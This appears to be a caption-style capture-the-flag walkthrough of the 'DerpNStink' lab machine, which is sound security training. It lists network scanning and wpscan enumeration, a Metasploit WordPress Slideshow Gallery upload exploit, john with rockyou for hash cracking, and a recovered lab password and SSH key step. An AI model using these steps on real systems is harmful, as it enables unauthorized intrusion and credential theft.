scaning the network
netdiscover -r 10.0.9.0/24
Checking if a web server is running on the target {Passive recon}
YES !!!!
NMAP SCAN WITH ONE OF THE PROFILES
NMAP -A -T3 10.0.9.129
FLAG 1 IN PAGE SOURCE
Some more looking around....
Some more looking around....
Some more looking around....
SOME DIRECTORY BUSTING BCOZ WHY NOT ..
dirb http://10.0.9.129
SOME DIRECTORY BUSTING BCOZ WHY NOT ..
dirb http://10.0.9.129
Interesting WordPress running on our server
FTPing the server as we know vftpd is running
ftp://10.0.9.129
FTPing the server as we know vftpd is running
ftp 10.0.9.129
SSH
ssh root@10.0.9.129
Key !! we need a key
WPScan the weblog directory
wpscan --url http://derpnstink.local/weblog/ --enumerate p --enumerate t --enumerate u --enumerate tt
And More
WPScan the weblog directory
wpscan --url http://derpnstink.local/weblog/ --enumerate p --enumerate t --enumerate u --enumerate tt
WPScan the weblog directory
wpscan --url http://derpnstink.local/weblog/ --enumerate p --enumerate t --enumerate u --enumerate tt
Users and Password of one
Metasploit have it
search Slideshow Gallery
Metasploit have it
exploit/unix/webapp/wp_slideshowgallery_upload
Metasploit have it
All options set
Metasploit have it
All options set
Metasploit have it
All options set
MySQL database
MySQL database
Bruteforceing
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Bruteforceing
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Accessing Wordpress panel
http://derpnstink.local/weblog/wp-login.php
Accessing Wordpress panel
http://derpnstink.local/weblog/wp-login.php
Now Escalate
Now Escalate
Now Escalate
Now Escalate
Now Escalate
Now ENUM
Now ENUM
Now ENUM
wedgie57
Now ENUM
Now ENUM
and chmod 400 stinky.key
Now ENUM
Now ENUM on the PCAP
http.request.method == POST
MR derp GOT PWNED
LETS GET ROOT !
YOU GOT PWNED
Thank you Thank you!!!